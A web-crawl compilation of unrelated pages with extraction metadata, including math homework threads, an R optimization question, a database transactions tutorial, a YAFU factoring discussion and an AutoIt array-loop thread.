Musso, Monica; Passaseo, Donato. Sign changing solutions of nonlinear elliptic equations. Adv. Differential Equations 1 (1996), no. 6, 1025--1052. https://projecteuclid.org/euclid.ade/1366895243. | 2017-09-21 14:05:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.472968190908432, "perplexity": 1841.1051381368723}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818687820.59/warc/CC-MAIN-20170921134614-20170921154614-00010.warc.gz"} |
http://openstudy.com/updates/55c2836de4b08de2ded1e684 | anonymous one year ago What are the factors of x2 − 64?
1. Nnesha
difference of square $\huge\rm a^2-b^2=(a+b)(a-b)$take square root of both terms
2. Nnesha
answer would be like this (sqrt of 1st term + sqrt of 2nd term)(sqrt of 1st term - sqrt of 2nd term) | 2017-01-19 13:26:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9069512486457825, "perplexity": 3776.3800278293056}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00122-ip-10-171-10-70.ec2.internal.warc.gz"} |
https://community.rstudio.com/t/optimize-a-function-containing-min-a-b-arguments/82786 | # optimize a function containing min(a,b) arguments
Dear community,
I am pretty new in R and due to the fact that I am totally desperate, I really hope someone has the time to help me to solve my problem:
I want to find the solution for the following equation, where lowercase variables are known and given as variables, uppercase (X) is the one i want to solve for:
0 = a/(Xb-min(c,bX)) - d
I thought it would be good to solve by finding the minimum of the RHS of the equation and translate the min() argument in inequality constraints as follows
min(a/(Xb-Y) - d)
s.t. Y-c =< 0, Y-b=<0,
-(a/(X
b-Y) - d )=<0
I added the third inequality constraint because otherwise my initial function is not going to be equal to zero but highly negative.
It is probably a very easy equation to solve, and I might have done too many steps due to the fact that I am not a big programmer, but here is my code how I tried to solve it, whick gives me errors unfortunately:
library(nloptr)
myfun<- function(X,Y,a,b,d){
return(a/(X*b-Y) - d)}
eval_g_ineq <- function(X,Y,a,b,c,d,){
return(c(Y-c , Y-b, -(a/(X*b-Y) - d)))}
opts = list("algorithm"="NLOPT_LD_MMA",
"xtol_rel"=1.0e-4) # here I dont know if I use the right algorithm but I got errors before alerady
#here comes my optimization function:
nloptr(x0=1, eval_f=myfun, eval_g_ineq = eval_g_ineq, lb=0, ub=Inf, opts=opts,
a=100, b=20, c=30, d=1)
And here comes my error:
Error in .checkfunargs(eval_f, arglist, "eval_f") : eval_f requires argument 'Y' but this has not been passed to the 'nloptr' function.
I also tied to specify two optimization values (for X and Y) as x0=c(1,1), lb=c(0,0), ub=c(Inf,Inf) but it didn't work. Is any one out there that is so kind and could give me some hints? Many many thanks in advance!
Best, Hans
f(x) = y is the starting point for R problem solving.
f, x\ \& \ y are objects with different properties.
x is the object at hand, y is the object desired and f is the object that converts x to y.
x in the OP is a combination of elements a,\ X, \ b, \ c\ \&d. where X is presumably a variable and the others constants.
y is a return value, 0.
f is to be composed.
An initial ambiguity must be cured in this fragment, a/(X b What does the blank between Xandbsignify. For illustration, assume+ and formin(c,b X) assume,
A auxiliary function
g <- function(a, X, b, c, d) a / (X * b - min(c, b, X)) - d
# let
a <- 2
X <- 3
b <- 4
c <- 5
d <- 6
g(a, X, b, c, d)
#> [1] -5.777778
`
Created on 2020-09-30 by the reprex package (v0.3.0.9001)
Therefore, find f(g(x)) = y , such that X \in x produces y = 0.
This topic was automatically closed 21 days after the last reply. New replies are no longer allowed.
If you have a query related to it or one of the replies, start a new topic and refer back with a link. | 2022-01-19 07:19:55 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.772832453250885, "perplexity": 1521.7669973481613}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320301264.36/warc/CC-MAIN-20220119064554-20220119094554-00158.warc.gz"} |
https://notesformsc.org/transaction-management/ | Transaction Management
In database, transactions are very important to maintain the consistent state of the database. We need to consider the users who operate and access database, and alter the state. This is an important aspect of database management which you will study in this article.
What is Transaction?
Database Transaction is a logical unit of processing in a DBMS that consists of one or more database access operations. In a nutshell, database transactions show real-world events of any enterprise.
All varieties of database access operations that are held among the beginning and conclude transaction statements are considered as a single logical transaction in DBMS.
The database is uncertain transactions during the transaction. Only once the database is dedicated the state is changed from one consistent state to another.
• A transaction is a program unit whose execution might also add changes or won’t alternate to the contents of a database.
• The transaction concept in DBMS is accomplished as a single unit.
• If the database operations do not update the database but only retrieve data, this type of transaction is called a read-only transaction.
• A successful transaction can change the database from one certain State to another.
• DBMS transactions must be atomic, consistent, steady, and durable
• If the database were in an incompatible state before a transaction, it would remain in the inconsistent state at end of the transaction.
Why do you want concurrency in Transactions?
A database is a shared resource accessed. It is used by many customers and processes concurrently. For example, the banking device, railway reservations, air reservations systems, stock market monitoring, supermarket inventory, checkouts, etc.
Not managing concurrent access may create issues, for example:
• Hardware failure and additionally system crashes
States of Transactions
Let’s study, how a transaction moves between these various states are indexed below:
1. Once a transaction state performing, it becomes active. It can issue READ or WRITE operations.
• Once the READ and WRITE operations are complete, the transactions turn out to be partially committed state.
• After it, some recovery protocols need to ensure that a system failure will not result in an inability to record changes in the transaction permanently. If this check is a success, the transaction commits and enters the committed state.
• If the check becomes fail, the transaction goes to the Failed state.
• If the transaction is terminated while it’s in the active state, it goes to the failed state. The transaction should be rolled back to undo the effect of its write operations on the database.
• The terminated state refers to the transaction leaving the system.
How do we define ACID Properties?
ACID Properties are used for maintaining the integrity of the database during transaction processing. In DBMS “ACID” consists of Atomicity, Consistency, Isolation, and Durability.
• Atomicity: A transaction follows a single unit of operation. You either execute it completely or no longer execute it at all. There cannot be unequal execution.
• Consistency: Once the transaction is executed, it should move from one consistent state to another.
• Isolation: Transaction should be executed in isolation from other transactions (no Locks). During concurrent transaction execution, ongoing transaction results from simultaneously executed transactions should not be made available to each other. (Level 0,1,2,3)
• Durability: · After successful completion of a transaction, the changes within the database have to persist. Even in the case of system failures.
ACID Property in DBMS:
Below is an example of an ACID property in DBMS:
Transaction 1: Begin X=X+50, Y = Y-50 END
Transaction 2: Begin X=1.1*X, Y=1.1*Y END
Transaction 1 is transferring \$50 from account X to account Y
Transaction 2 is adding each account with a 10% interest payment
If both of these transactions are submitted together, there is no guarantee that Transaction 1 will execute before Transaction 2 or vice versa. Despite any order, the result must be as if the transactions take place serially one after the other.
Consider the following transaction T consisting of T1 and T2: Transfer of 100 from account X to account Y.
If the transaction fails after completion of T1 but before completion of T2.( say, after write(X) but before write(Y)), then the amount has been deducted from X but not added to Y.
This results in an inconsistent database state. Therefore, the transaction must be executed totally to check the accuracy of the database state.
Consistency: This means that integrity constraints must be maintained so that the database is uncertain before and after the transaction. It refers to the accuracy of a database.
Referring to the example above, the total amount before and after the transaction must be maintained.
Total before when T ( before T1 and T2) occurs = 500 + 200 = 700
Total after T (After T1 and T2) occurs = 400 + 300 = 700
Therefore, it results in the database being consistent. Inconsistency occurs in case T1 completes but T2 fails. As a result, T becomes incomplete.
Isolation: This property checks further that multiple transactions can occur concurrently without leading to the inconsistency of the database state. Transactions occur independently without interference.
Changes occurring in a particular transaction will not be visible to any other transaction until that change in that transaction is written to memory or has been fixed.
The ACID properties, provide a mechanism to ensure the correctness and consistency of a database in a way such that each transaction is a bunch of operations that act as one unit, produce consistent results, act in isolation from other operations, and update that it makes are durably stored.
Types Of DBMS Schedules
Types of schedules in the DBMS Schedule are a process of lining the transactions and executing them one by one. When multiple transactions are running concurrently and the order of operation is needed to be set so that the operations do not overlap each other, Scheduling is brought into play and the transactions are timed accordingly.
• Serial Schedules: Schedules in which the transactions are executed non-interleaved, i.e., a serial schedule is one in which no transaction starts until a running transaction has ended are called serial schedules. i.e., In the Serial schedule, a transaction is executed completely before starting the execution of another transaction.
In other words, you can say that in a serial schedule, a transaction does not start execution until the currently running transaction finishes execution. This type of execution of the transaction is also known as non-interleaved execution. The example we have seen above is the serial schedule.
• Non-Serial Schedule: This is a type of Scheduling where the operations of multiple transactions are provided. This would possibly cause a rise in the concurrency problem.
The transactions are executed irregularly, keeping the result correct and the same as the serial schedule. Unlike the serial schedule where one transaction must wait for another to complete all its operations, in the non-serial schedule, the other transaction proceeds without waiting for the previous transaction to complete.
This sort of schedule does not provide any benefit for the concurrent transaction. It parted into two types namely, Serializable and Non-Serializable Schedules. The Non-Serial Schedule can be further split into Serializable and Non-Serializable.
Serializable:
This is used to maintain the regularity of the database. It is mainly used in non-Serial scheduling to check whether the scheduling will lead to any inconsistency or not. On the other hand, a serial schedule does not need serializability because it follows a transaction only when the previous transaction is complete.
The non-serial schedule is said to be in a serializable schedule only when it is equivalent to the serial schedules, for an n number of transactions. As a result, concurrency is allowed in this case thus, multiple transactions can execute concurrently.
These are of two types:
1. Conflict Serializable: A schedule is called conflict serializable if it can be converted into a serial schedule by swapping non-conflicting operations.
2. View Serializable: A Schedule is called view serializable if it is view equal to a serial schedule (no overlapping transactions). A conflict schedule is a view serializable
Non-Serializable:
The non-serializable schedule is divided into two types, Recoverable and Non-recoverable Schedules. More on this later.
Summary
You learned that the consistency of database is important as transactions are executed. The nature of transactions are expected to be consistent with ACID properties. Though it appears that the transactions are executed simultaneously, it is serialized mostly, we will explore on this topic in future articles.
In the next article, you will learn how database management maintain the concurrency. | 2023-03-24 10:17:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19824422895908356, "perplexity": 1659.158082842211}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945279.63/warc/CC-MAIN-20230324082226-20230324112226-00105.warc.gz"} |
https://www.physicsforums.com/threads/really-hard-infinite-series-test.163851/ | # Homework Help: Really hard infinite series test
1. Apr 2, 2007
### Doom of Doom
1. The problem statement, all variables and given/known data
Test to see whether the following series converges
$$\sum_{n=1}^\infty \sqrt[n]{2}-1$$
2. Relevant equations
All we've done so far is integral test, ratio test, and root tests.
3. The attempt at a solution
As n approaches infinity, the term apporaches 0, so it may or may not converge.
A ratio test reveals r=1, so it is inconclusive
A root test also gives us 1, so it is inconclusive
I have no idea how i would take the integral of that.
I do know that it diverges, but I have no idea how! I don't know why the prof would give such a hard homework problem.
Last edited: Apr 3, 2007
2. Apr 3, 2007
### tim_lou
use limit test and compare it to 1/n (use L'Hopital's rule)
3. Apr 3, 2007
### AKG
Do you know the comparison test?
4. Apr 3, 2007
### Gib Z
I don't understand you notation :(
But the gist of it is, we find a series that is term by term smaller than the series we wish to test. If the smaller series converges, the test is inconclusive but you can try another smaller series. But if the smaller series diverges, the larger one will as well. Is 1/n term by term smaller than your series?
5. Apr 3, 2007
### cristo
Staff Emeritus
It's this, Gib: $$\sum_{n=1}^\infty \sqrt[n]{2}-1$$. At least that's what the latex looked like it was trying to show!
6. Apr 3, 2007
### Doom of Doom
1/n is bigger that this series term by term, so the comparison test does not work either!
Unless there is another series that is smaller than this series term-by-term that still diverges
7. Apr 3, 2007
### StatusX
How'd you get this? I think it's wrong.
8. Apr 3, 2007
### Doom of Doom
StatusX,
when n=1, the terms are equal. When n=2:
1/2= 0.5
[2^(1/2)-1] =0.41421
note that .5>.414.
When n=3:
1/3=.33333
[2^(1/2)-1] =0.25992
Last edited: Apr 3, 2007
9. Apr 3, 2007
### Doom of Doom
The notation should be
$$\sum_{n=1}^\infty (\sqrt[n]{2}-1\ ) )$$
sorry for any confusion. I can't seem to get LaTeX to close the parenthesis on the outer end (outside the -1)
10. Apr 3, 2007
### Dick
1/n may be larger than the series, but what about ln(2)/n?
11. Apr 3, 2007
### StatusX
Sorry, you're right. But the terms do tend to 1/n (from below), so for any c<1, c/n will eventually be dominated the series.
12. Apr 3, 2007
### AKG
(Part of) The limit comparison test: if an > 0, bn > 0, and the limit of an/bn is greater than 0, then if $\sum b_n$ diverges, then so does $\sum a_n$. Compare an = 21/n-1 to bn = n-1, since you know $\sum n^{-1}$ diverges. | 2018-11-20 17:31:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8389468193054199, "perplexity": 2243.9523096639805}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039746528.84/warc/CC-MAIN-20181120171153-20181120193153-00138.warc.gz"} |
https://mersenneforum.org/showthread.php?s=84c59e59a94c32fd3ca5ac0e9aa6d772&t=16589&page=2 | mersenneforum.org > YAFU Featured request
Register FAQ Search Today's Posts Mark Forums Read
2012-02-29, 05:51 #12
bsquared
"Ben"
Feb 2007
23×163 Posts
Quote:
Originally Posted by LaurV After I clicked on your "here" and read a couple of posts about the balance between ecm and siqs (mixed in that discussion) some stupid idea came into my mind: would it be possible to start ecm and siqs in the same time on a multithreaded machine? Does it make sense? O is all gibberish?
I think I understand, but I'm having trouble seeing how it makes things faster *on average*. I guess you might save by hitting some time-optimal balance point more accurately, but it's still a guess as to what that time-optimal point might be, and in any case I changed from a time-balanced ecm/qs strategy to a pretest-level-based ecm/qs strategy in version 1.30. I won't even get into the scale of code change that would be required to do something like that
Quote:
Originally Posted by LaurV In the past I did many tests with plan=light against plan=normal. Occasionally I used plan=deep but for siqs-factorable cofactors it was never necessarily to go deep with the ecm, only for nfs-factorable composite it made sense to do it. Usually a "light" ecm and siqs was faster per total numbers factored, and only rarely would the "normal" ecm find factors missed by "light" ecm.
Have you done the same with the new plan defaults? Or have you settled on a custom plan ratio that you like?
2012-02-29, 08:06 #13
Random Poster
Dec 2008
179 Posts
Quote:
Originally Posted by bsquared I think I understand, but I'm having trouble seeing how it makes things faster *on average*.
It depends on what you mean by "faster". Usually you do ECM for time x which succeeds with probability p, and if it fails you do QS for time y, so the expected total time is x+(1-p)y; this is less than y iff x/p<y. With the suggested change you would do ECM for x and QS for x at the same time and then possibly QS for y-x, so expected wall-clock time is x+(1-p)(y-x) but expected processor time is 2x+(1-p)(y-x); the expected wall-clock time is less than y iff x<y, but the expected processor time is less than y iff x(1+1/p)<y. So if you only have a single number to factor and don't mind wasting processor time, by all means do ECM on one thread and QS on another at the same time (which should be simple enough to do manually), but YAFU should be optimized to minimize processor time.
2012-02-29, 08:49 #14
LaurV
Romulan Interpreter
"name field"
Jun 2011
Thailand
101000001011012 Posts
Quote:
Originally Posted by bsquared Have you done the same with the new plan defaults? Or have you settled on a custom plan ratio that you like?
No, and no. For a simple and objective reason: I am out of "siqs range". There was a time when I was doing mostly siqs, but now I involved better computers and all my aliquots advanced in the 120-150 digits range and I very seldom try to factor lower stuff. You remember there was a time when I continuously bothered you about siqs (which I still understand, contrary to nfs which I only partially understand), but that time is now "past" as long as I don't need too often to factor under-100-digits composites. Maybe someday I would move my ass and put the hand on the book and try to workout the nfs. But for now I am just using it blind.
2012-02-29, 08:59 #15
LaurV
Romulan Interpreter
"name field"
Jun 2011
Thailand
5×112×17 Posts
Quote:
Originally Posted by Random Poster so the expected total time is x+(1-p)y
Shouldn't be px+(1-p)y? And in fact you get always a better number, no matter if you minimize the wall clock time or the processor time (assuming they are directly proportional), and then no matter if you do one or more factorizations. More factorizations are just one factorization at the power of n, hehe, or say, one-by-one factorization. As said in the former post, this only affects the siqs, where consumed time is comparable with the ecm consumed time (for a siqs-range composite) and you know exactly how many relations you will need, and you can maximize the efficiency (minimize the time spent in ecm+siqs). For nfs - where such optimization would be more wanted - it can not be done (or not so easy, or I don't have enough knowledge about nfs to see how it could be done).
2012-02-29, 13:56 #16
EdH
"Ed Hall"
Dec 2009
5,419 Posts
Quote:
Originally Posted by bsquared I can't judge interest, maybe others will respond, but as long as you are willing to work fairly independently of me, I'm all for it. Not that I'm trying to distance myself from it, just trying not to create extra work for myself . BTW, I've thought about this before, but never took it on for one reason or another. One reason is that every time I thought about it I immediately saw opportunity for a multitude of neat bells/whistles that would have been far too time consuming to implement. Not trying to discourage you... Go for it if it is interesting to you! As a matter of curiosity, what would you use to create the GUI? Something cross-platform like Qt or tcl/tk, or would it be a windows only thing?
My expectations would be a totally separate front end that would simply offer a lot of the switches and functions as buttons with edit boxes to enter data. Like I did with AliWin, I'd have everything build a "command line" that would be displayed in a central box and by clicking on a "Run YAFU" button, a separate console window would open with that command issued.
Once the new console window is running, the GUI would basically sit, or possibly watch any generated "log" files. It would not interface with the running instance of YAFU, other than terminating it, if that is desired.
At this point I'm looking at only a Windows interface, written in C++, compiled via Dev-C++ with source code and binary available. I'd like to expand it to linux in the future, but I've never been happy with any of the GUI packages I've studied for linux, yet.
It would probably look quite different, but here's an image of AliWin2 running Aliqueit:
Attached Thumbnails
Last fiddled with by EdH on 2012-02-29 at 13:57
2012-02-29, 15:45 #17
bsquared
"Ben"
Feb 2007
374910 Posts
Quote:
Originally Posted by LaurV No, and no. For a simple and objective reason: I am out of "siqs range". There was a time when I was doing mostly siqs, but now I involved better computers and all my aliquots advanced in the 120-150 digits range and I very seldom try to factor lower stuff. You remember there was a time when I continuously bothered you about siqs (which I still understand, contrary to nfs which I only partially understand), but that time is now "past" as long as I don't need too often to factor under-100-digits composites. Maybe someday I would move my ass and put the hand on the book and try to workout the nfs. But for now I am just using it blind.
ECM pretesting and -plan apply to nfs too. I guess you are using aliqueit for the ecm and factMsieve for the nfs, which is fine.
2012-03-28, 01:04 #18 Dubslow Basketry That Evening! "Bunslow the Bold" Jun 2011 40 P I typed in a random number: Code: >> factor(134085979082345987629876542398717) factoring 134085979082345987629876542398717 using pretesting plan: normal no tune info: using qs/gnfs crossover of 95 digits div: primes less than 10000 fmt: 1000000 iterations rho: x^2 + 3, starting 1000 iterations on C29 rho: x^2 + 2, starting 1000 iterations on C29 rho: x^2 + 2, starting 1000 iterations on C24 Total factoring time = 0.0006 seconds ***factors found*** P4 = 4057 P5 = 75883 P5 = 33289 PRP20 = 13083776549900283863 When I C/V the number into WolframAlpha, it is able to tell me (in the few seconds it takes for the page to load) that this PRP is in fact P. A few 30 digit PRPs were also listed as prime by WolframAlpha. I'm not exactly sure which tests might be best used, but it is apparent that there are tests that prove primality in a (very) short period of time, since WolframAlpha can do it. (They're not using a database, are they? It's certainly not factordb, since I just added that P20 into it, and it said PRP as well. In fact, it seems that FDB needs a better small-P algorithm as well as YAFU. Edit: I just went back to that page on FDB and now it says P, and this was only a minute later.) I'm not sure what WA's (or FDB's) limits are, but I'll test that now. Edit: What yafu reported as PRP45 and PRP46, factordb report now as P. Last fiddled with by Dubslow on 2012-03-28 at 02:02
2012-03-28, 03:52 #19 bsquared "Ben" Feb 2007 23×163 Posts There are certainly algorithms that can prove primalty of such small numbers very quickly, I just haven't implemented any of them (I'm thinking in particular of APRCL). Pretty much all of the time I'm ok with the 1 chance in 4^20 that the PRP's have of actually being composite. If there ever comes a day when I just have to know for sure, I'll go to somewhere like WolframAlpha or Alpertron's webpage :) Anyone have an APRCL implemention they would want to contribute to YAFU?
2012-03-28, 05:16 #20 Dubslow Basketry That Evening! "Bunslow the Bold" Jun 2011 40> q` quits?
2012-03-28, 05:34 #21
CRGreathouse
Aug 2006
22·3·499 Posts
Quote:
Originally Posted by Dubslow When I C/V the number into WolframAlpha, it is able to tell me (in the few seconds it takes for the page to load) that this PRP is in fact P. A few 30 digit PRPs were also listed as prime by WolframAlpha. I'm not exactly sure which tests might be best used, but it is apparent that there are tests that prove primality in a (very) short period of time, since WolframAlpha can do it. (They're not using a database, are they? It's certainly not factordb, since I just added that P20 into it, and it said PRP as well. In fact, it seems that FDB needs a better small-P algorithm as well as YAFU. Edit: I just went back to that page on FDB and now it says P, and this was only a minute later.) I'm not sure what WA's (or FDB's) limits are, but I'll test that now. Edit: What yafu reported as PRP45 and PRP46, factordb report now as P.
I'm not sure it actually proved primality! Mathematica's PrimeQ only tests probable-primality. Mathematica does have some tests for proving primality but they're fairly weak. It would surprise me if W|A was more able.
Quote:
Originally Posted by bsquared There are certainly algorithms that can prove primalty of such small numbers very quickly, I just haven't implemented any of them (I'm thinking in particular of APRCL). Pretty much all of the time I'm ok with the 1 chance in 4^20 that the PRP's have of actually being composite. If there ever comes a day when I just have to know for sure, I'll go to somewhere like WolframAlpha or Alpertron's webpage :) Anyone have an APRCL implemention they would want to contribute to YAFU?
PARI has an excellent APR-CL implementation, probably the best out there (by my testing, anyway). You can take it under GPLv2+ AFAIK, if your license is compatible.
Last fiddled with by CRGreathouse on 2012-03-28 at 05:35
2012-03-28, 07:25 #22 Dubslow Basketry That Evening! "Bunslow the Bold" Jun 2011 40
Similar Threads Thread Thread Starter Forum Replies Last Post ET_ Programming 0 2018-11-01 14:57 Dubslow YAFU 4 2012-03-31 03:07 Xyzzy Lounge 23 2011-03-08 17:50 ixfd64 Software 10 2010-05-31 15:21 rogue GMP-ECM 4 2009-11-23 15:07
All times are UTC. The time now is 13:28.
Fri Mar 31 13:28:01 UTC 2023 up 225 days, 10:56, 0 users, load averages: 0.76, 0.90, 0.92 | 2023-03-31 13:28:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5127715468406677, "perplexity": 2347.9007211983617}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949642.35/warc/CC-MAIN-20230331113819-20230331143819-00649.warc.gz"} |
https://www.autoitscript.com/forum/topic/185204-2-ubound-arrays-wont-work-together/ | # 2 ubound arrays wont work together
## 14 posts in this topic
#1 · Posted (edited)
#include <array.au3>
#include <file.au3>
Local $text _FileReadToArray("text.txt",$text) ; read the list of names to array
Local $test _FileReadToArray("test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
MsgBox(4096, "Test", $text[$i] & " - " & $test[$u])
Next
Next
When I run this only the first ubound array works, the second does not change value?
Do you have a suggestion for me.
Edited by RyukShini
##### Share on other sites
#include <array.au3>
#include <file.au3>
Local $text Local$test
_FileReadToArray(@ScriptDir & "\text.txt", $text) ; read the list of names to array _FileReadToArray(@ScriptDir & "\test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
MsgBox(4096, "Test", $text[$i] & " - " & $test[$u])
Next
Next
My Contributions...
# FTP Connection Tester / INI File - Read, Write, Save & Load Example
##### Share on other sites
your script works fine just need to declare $text and$test
#include <array.au3>
#include <file.au3>
Local $text _FileReadToArray("text.txt",$text) ; read the list of names to array
Local $test _FileReadToArray("test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
MsgBox(4096, "Test", $text[$i] & " - " & $test[$u])
Next
Next
ill get to that... i still need to learn and understand a lot of codes
Correct answer, learn to walk before you take on that marathon.
##### Share on other sites
...echo ...echo...echo...
1 person likes this
My Contributions...
# FTP Connection Tester / INI File - Read, Write, Save & Load Example
##### Share on other sites
1 person likes this
ill get to that... i still need to learn and understand a lot of codes
Correct answer, learn to walk before you take on that marathon.
##### Share on other sites
1 hour ago, 232showtime said:
your script works fine just need to declare $text and$test
#include <array.au3>
#include <file.au3>
Local $text _FileReadToArray("text.txt",$text) ; read the list of names to array
Local $test _FileReadToArray("test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
MsgBox(4096, "Test", $text[$i] & " - " & $test[$u])
Next
Next
1 hour ago, l3ill said:
#include <array.au3>
#include <file.au3>
Local $text Local$test
_FileReadToArray(@ScriptDir & "\text.txt", $text) ; read the list of names to array _FileReadToArray(@ScriptDir & "\test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
MsgBox(4096, "Test", $text[$i] & " - " & $test[$u])
Next
Next
Sorry That was a mistake not to declare.
After declaring the variables it still doesn't work.
$test[$u] does not change its value, it remains the same however $text[$i] changes.
##### Share on other sites
What's in the test.txt file?
If I posted any code, assume that code was written using the latest release version unless stated otherwise. Also, if it doesn't work on XP I can't help with that because I don't have access to XP, and I'm not going to.
Give a programmer the correct code and he can do his work for a day. Teach a programmer to debug and he can do his work for a lifetime - by Chirag Gude
How to ask questions the smart way!
I hereby grant any person the right to use any code I post, that I am the original author of, on the autoitscript.com forums, unless I've specifically stated otherwise in the code or the thread post. If you do use my code all I ask, as a courtesy, is to make note of where you got it from.
Back up and restore Windows user files _Array.au3 - Modified array functions that include support for 2D arrays. - ColorChooser - An add-on for SciTE that pops up a color dialog so you can select and paste a color code into a script. - Customizable Splashscreen GUI w/Progress Bar - Create a custom "splash screen" GUI with a progress bar and custom label. - _FileGetProperty - Retrieve the properties of a file - SciTE Toolbar - A toolbar demo for use with the SciTE editor - GUIRegisterMsg demo - Demo script to show how to use the Windows messages to interact with controls and your GUI. - Latin Square password generator
##### Share on other sites
show your full script and content of the txt file, its working fine with me.
ill get to that... i still need to learn and understand a lot of codes
Correct answer, learn to walk before you take on that marathon.
##### Share on other sites
#9 · Posted (edited)
Edited by abdulrahmanok
##### Share on other sites
RyukShini,
You have 2 embedded loops - as a result you will get the following returns:
Line 1 of test - Line 1 of text
Line 2 of test - Line 1 of text
... ; And this continues until the last line of the file
Line n of test - Line 1 of text
Line 1 of test - Line 2 of text ; Only then will the line of the outer loop change and the process repeat
Line 2 of test - Line 2 of text
...
